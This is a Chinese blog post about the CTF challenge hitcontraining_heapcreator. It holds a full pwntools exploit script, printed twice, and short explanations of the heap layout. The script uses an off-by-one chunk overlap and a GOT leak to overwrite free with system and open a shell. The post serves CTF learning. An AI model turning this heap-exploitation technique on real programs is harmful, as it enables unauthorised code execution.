hitcontraining_heapcreator 一點小疑惑
阿新 • • 發佈:2021-09-28
exp:
from pwn import *
from LibcSearcher import LibcSearcher

# Remote target kept commented out; the script below drives the local binary.
#sh=remote("node3.buuoj.cn",25984)
sh = process("./heapcreator")
elf=ELF('./heapcreator')


def create(length: int, value) -> None:
    """Menu option 1: allocate an entry of `length` bytes and fill it with `value`."""
    sh.recvuntil("Your choice :")
    sh.sendline("1")
    sh.recvuntil("Size of Heap : ")
    sh.sendline(str(int(length)))
    sh.recvuntil("Content of heap:")
    sh.sendline(value)


def edit(index: int, value) -> None:
    """Menu option 2: replace the content of entry `index` with `value`."""
    sh.recvuntil("Your choice :")
    sh.sendline("2")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
    sh.recvuntil("Content of heap : ")
    sh.sendline(value)


def show(index: int) -> None:
    """Menu option 3: have the program print entry `index`; the caller reads the output."""
    sh.recvuntil("Your choice :")
    sh.sendline("3")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))


def delete(index: int) -> None:
    """Menu option 4: free entry `index`."""
    sh.recvuntil('Your choice :')
    sh.sendline('4')
    sh.recvuntil('Index :')
    sh.sendline(str(int(index)))


# Four entries (indices 0-3); index 3 holds '/bin/sh' and is the one freed at the end.
create(0x18,'aaaa')
create(0x10,'bbbb')
create(0x10,'cccc')
create(0x10,'/bin/sh')

# 0x19 bytes written into the 0x18-byte entry 0: the trailing 0x81 lands one byte
# past the requested size.
# NOTE(review): the menu strings are sent as str while the later payload is bytes;
# this single '\x81' relies on pwntools encoding the str to exactly one byte —
# confirm on the pwntools/Python version in use.
edit(0,'a'*0x18+'\x81')

# Entry 1 is freed first and re-allocated below with a larger size (see the write-up's
# point 1): the 0x10-byte entry could not otherwise take a 0x70-byte payload.
delete(1)

# 8-byte little-endian value 8, followed by the address of free@GOT.
size = b'\x08'.ljust(8,b'\x00')
payload = b'd'*0x40+ size + p64(elf.got['free'])
create(0x70,payload)

# NOTE(review): debugger attach left in for heap inspection; it pauses the run
# and would have to be removed for an unattended or remote run.
gdb.attach(sh)

# Read the value printed for entry 2: bytes between 'Content : ' and 'Done',
# with the trailing 5 bytes dropped and zero-padded to 8 before unpacking.
show(2)
sh.recvuntil('Content : ')
free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00'))

# Resolve libc from the leaked free address and derive system by symbol offset.
libc=LibcSearcher("free",free_addr)
system_addr=free_addr+libc.dump("system")-libc.dump("free")

# Write system's address through entry 2, then free entry 3.
edit(2,p64(system_addr))
delete(3)
sh.interactive()
from pwn import *
from LibcSearcher import LibcSearcher

# Remote target kept commented out; the script below drives the local binary.
#sh=remote("node3.buuoj.cn",25984)
sh = process("./heapcreator")
elf=ELF('./heapcreator')


def create(length: int, value) -> None:
    """Menu option 1: allocate an entry of `length` bytes and fill it with `value`."""
    sh.recvuntil("Your choice :")
    sh.sendline("1")
    sh.recvuntil("Size of Heap : ")
    sh.sendline(str(int(length)))
    sh.recvuntil("Content of heap:")
    sh.sendline(value)


def edit(index: int, value) -> None:
    """Menu option 2: replace the content of entry `index` with `value`."""
    sh.recvuntil("Your choice :")
    sh.sendline("2")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
    sh.recvuntil("Content of heap : ")
    sh.sendline(value)


def show(index: int) -> None:
    """Menu option 3: have the program print entry `index`; the caller reads the output."""
    sh.recvuntil("Your choice :")
    sh.sendline("3")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))


def delete(index: int) -> None:
    """Menu option 4: free entry `index`."""
    sh.recvuntil('Your choice :')
    sh.sendline('4')
    sh.recvuntil('Index :')
    sh.sendline(str(int(index)))


# Four entries (indices 0-3); index 3 holds '/bin/sh' and is the one freed at the end.
create(0x18,'aaaa')
create(0x10,'bbbb')
create(0x10,'cccc')
create(0x10,'/bin/sh')

# 0x19 bytes written into the 0x18-byte entry 0: the trailing 0x81 lands one byte
# past the requested size.
# NOTE(review): the menu strings are sent as str while the later payload is bytes;
# this single '\x81' relies on pwntools encoding the str to exactly one byte —
# confirm on the pwntools/Python version in use.
edit(0,'a'*0x18+'\x81')

# Entry 1 is freed first and re-allocated below with a larger size (see the write-up's
# point 1): the 0x10-byte entry could not otherwise take a 0x70-byte payload.
delete(1)

# 8-byte little-endian value 8, followed by the address of free@GOT.
size = b'\x08'.ljust(8,b'\x00')
payload = b'd'*0x40+ size + p64(elf.got['free'])
create(0x70,payload)

# NOTE(review): debugger attach left in for heap inspection; it pauses the run
# and would have to be removed for an unattended or remote run.
gdb.attach(sh)

# Read the value printed for entry 2: bytes between 'Content : ' and 'Done',
# with the trailing 5 bytes dropped and zero-padded to 8 before unpacking.
show(2)
sh.recvuntil('Content : ')
free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00'))

# Resolve libc from the leaked free address and derive system by symbol offset.
libc=LibcSearcher("free",free_addr)
system_addr=free_addr+libc.dump("system")-libc.dump("free")

# Write system's address through entry 2, then free entry 3.
edit(2,p64(system_addr))
delete(3)
sh.interactive()
1.為什麼要將chunk1釋放後再進行malloc,然後填入資料。而不是直接填入資料?
假如直接填入資料的話,改變一下exp
然後檢視堆發現
chunk1的size沒有變,所以最多還是只能輸入0x10大小的資料,所以我們要先free掉,然後再malloc(0x70),讓chunk的size變成0x70,然後填充資料
2.如圖
為什麼填入的資料會從0x1616050開始?
因為每次add都會創立兩個chunk,第一個chunk就是0x1616070處,在後面將會被覆蓋,所以我會有這個疑問。第二個chunk,也就是填入資料的chunk,就在0x1616040,0x1616048是size,0x1616050是資料儲存的地方。